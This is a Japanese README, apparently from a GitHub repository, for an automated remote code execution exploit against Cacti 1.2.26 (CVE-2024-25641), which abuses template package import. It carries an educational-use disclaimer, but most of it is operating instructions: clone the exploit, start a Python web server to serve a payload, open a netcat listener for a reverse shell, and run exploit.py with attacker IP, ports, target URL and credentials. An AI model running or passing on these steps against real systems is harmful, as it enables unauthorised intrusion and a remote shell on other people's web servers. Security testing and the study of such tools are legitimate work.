
CVE-2024-25641 - RCE自動エクスプロイト - Cacti 1.2.26
CVE-2024-25641 向けの完全自動化エクスプロイト。 ユーザーが認証されている場合、Cacti バージョン 1.2.26 は任意ファイル書き込みの脆弱性(「パッケージインポート」機能を介して悪用可能)に対して脆弱であり、 「Import Templates」権限を持つ認証済みユーザーが Web サーバー上で任意の PHP コードを実行(RCE)できるようになります。
この PoC のクレジット: https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (私はこれを単に自動化して足がかりを得ました。)
このツールは教育およびテスト目的のみを意図しています。このツールの作者は、これを使用して行われた誤用や違法行為に対して一切の責任を負いません。 このツールは、自分が所有するシステム、またはテストする明示的な許可があるシステムでのみ使用してください。 コンピュータシステムへの不正アクセスは違法かつ非倫理的です。
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>
# Setup netcat listener
nc -lvnp <LOCAL_PORT>
# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>
こちらもご確認ください: CVE-2024-25641 PoC